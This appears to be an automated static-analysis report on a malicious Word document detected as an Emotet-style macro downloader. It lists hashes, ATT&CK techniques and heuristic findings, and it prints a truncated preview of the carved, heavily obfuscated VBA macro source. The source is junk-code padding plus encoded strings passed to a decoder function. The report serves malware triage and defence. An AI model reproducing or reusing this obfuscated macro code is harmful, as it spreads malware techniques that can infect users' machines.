Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e1e1443d54190e14…

MALICIOUS

Office (OLE)

270.0 KB Created: 2018-03-28 17:02:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: eb40f326f9a92b29186626e2c4195820 SHA-1: 727be53157d5bae42e2df648688a17d95d1fb609 SHA-256: e1e1443d54190e14611e0deb199f3bddd64f4f5912efd9f62fc86ed9ec37b623
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and exhibits multiple high-severity heuristic firings related to VBA macros, including AutoOpen and CreateObject calls. The presence of a VBA macro in 'macros.bas' suggests an attempt to execute code. While the macro code is heavily obfuscated, the heuristics indicate it is designed to auto-execute and create objects, a common pattern for downloading and running further malicious content. The file is likely delivered as a spearphishing attachment.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63498 bytes
SHA-256: 98a68c966e29e8c2983cdf41b6a1a88a7340c74c623101ffd014280803694918
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 26 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FwiilJzF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bSMrqOM"
Function UYKBBqdB()
On Error Resume Next
Select Case uwbSq
      Case 35231
         FUwoBA = CStr(Njuzp + CStr(4508) - CdmzVa * 67569)
      Case 17081
         lzNLni = qDVisd
         IIwdjS = Tan(21845 * GrLrSo)
End Select
TIAANduGdOI = kIaQj("LOfPuiQBmAGQAZAA3ADIAYQij", 7, 17)
Select Case VrDws
      Case 21389
         npajzD = CStr(TXDZoi + CStr(83125) - wCqQv * 83402)
      Case 42503
         vLzXid = vkiSVI
         zUHwm = Tan(38652 * SiKbw)
End Select
Select Case JitzN
      Case 79913
         whcDpw = CStr(oWUkH + CStr(82641) - mAfzY * 9304)
      Case 75661
         iSklFk = DDcXuc
         uPqzTd = Tan(46070 * ttqBW)
End Select
mphXUaiIvYz = kIaQj("SSrJDUAOQA5AGIAOQBhADUAMAAyADQAMAAyAGQANQAwADIAYwBiAGYANABhAGEANQBjADgANAA3AGMANvO", 5, 75)
Select Case NBokCI
      Case 5466
         SEroD = CStr(QHjwh + CStr(22174) - QHZkJ * 36060)
      Case 52673
         quDNH = ComrUY
         wlIfaF = Tan(74425 * KuTLWz)
End Select
Select Case vzBEjP
      Case 39814
         LdikP = CStr(dtnCKC + CStr(46258) - QjSuT * 48588)
      Case 7420
         Xidfbz = FsXcdw
         tbTTPQ = Tan(36330 * fUaijV)
End Select
YZifaqmUTua = kIaQj("PkADEAMQA0AGIANwBmADAAYQA5A6DzdJr", 2, 26)
Select Case owvOdF
      Case 92660
         kJdAi = CStr(nZuSq + CStr(73826) - bzJnPr * 5875)
      Case 17329
         zSWTD = hPVUzU
         KlQkVr = Tan(91023 * MqjuMw)
End Select
Select Case Pkzpqw
      Case 70476
         IfKWU = CStr(tBWXj + CStr(67572) - OWnvX * 86207)
      Case 93199
         zzGJaE = YiQST
         jCZkGZ = Tan(93131 * uKQIQB)
End Select
ZVbGBQui = kIaQj("7ANQA5ADYAMwAxADADwZJ5", 2, 16)
Select Case LtTDo
      Case 52880
         hDMuE = CStr(dsHOPz + CStr(60368) - OLQTA * 88127)
      Case 5590
         qBJCvN = zOfzXU
         XLUMK = Tan(3916 * BtTVu)
End Select
Select Case adhPpG
      Case 84480
         zVSFLF = CStr(uqTHRj + CStr(18357) - zjtndj * 33013)
      Case 77946
         XTVTD = IARmDZ
         joASb = Tan(2487 * kGBRw)
End Select
FlhZMcsCD = kIaQj("zvOMSsAGIAYgBlADMADv", 7, 11)
Select Case jwTOFh
      Case 62446
         hrkdqG = CStr(GAwFH + CStr(90528) - EmLFP * 52911)
      Case 72077
         SDWTE = hCjVt
         BzQok = Tan(90591 * dFELp)
End Select
Select Case imoGb
      Case 46595
         EYQFj = CStr(kpTBGJ + CStr(83098) - NvJXQW * 59691)
      Case 17923
         vBERB = sYVGz
         mXTKk = Tan(89293 * ihZRDi)
End Select
TbvRjCwPL = kIaQj("zZABlAGYAYgA3ADMANQAxADcAOABmADEANwBlAGMAMgA2ADYANwBhADAAMQAyAGMANQBlADUAZABlADUAYQA5ADUAYgA4ADAANgBhADQAMAA1ADEAMwA2ADQAYgAzADAAZQA0ADEAYgA2ADEAYQA3ADQAYQA0AGQAYgBmADEANABiADQAMwA3ADkA2iRGvjJ,", 2, 184)
Select Case qijLB
      Case 47807
         RVEcai = CStr(bckCr + CStr(60127) - YqMfcv * 59849)
      Case 47430
         kAjjh = pKFaF
         COiKL = Tan(34692 * FoOLD)
End Select
Select Case TjVBHv
      Case 77417
         SEtBz = CStr(OXUYw + CStr(4368) - ktUHt * 26953)
      Case 99860
         UAatKd = YJAEzZ
         vtJSCa = Tan(94353 * sVhcip)
End Select
awLGiGF = kIaQj("JNfBjADIAMgA1ADkANAAxADMAZQBhAGUAYgAxADUANgAyADMAYwA2ADYAOQA1ADAANgA3ADcAZQAxADUAZQAxAGIAMQBkADEANQA3ADQANABmAGIAYwBkADgANgA2AGQANQA0AGYANgA0ADQANAA2AGYANQA2AGQAMgAyADEAYwAzADQANABlADkAOQBhAGI6P5", 4, 189)
Select Case tOhoD
      Case 95733
         TImol = CStr(LXuDck + CStr(96781) - wbLZAu * 16022)
      Case 9358
         ivmXP = WKVCsZ
         fNowP = Tan(39230 * izzrZv)
End Select
Select Case UivjLE
      Case 46908
         piKZVI = CStr(STZpZo + CStr(10358) - msrzj * 79987)
      Case 11095
         bhGXsi = MCNVj
         sEGdr = Tan(58527 * KTQDO)
End Select
BjqavjQNqU = kIaQj("0jcwoGQAOQA0ADkAOQAzAGEAOAAzADMANQAwADcANQA2ADUANAA3ADMAOABmADkA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.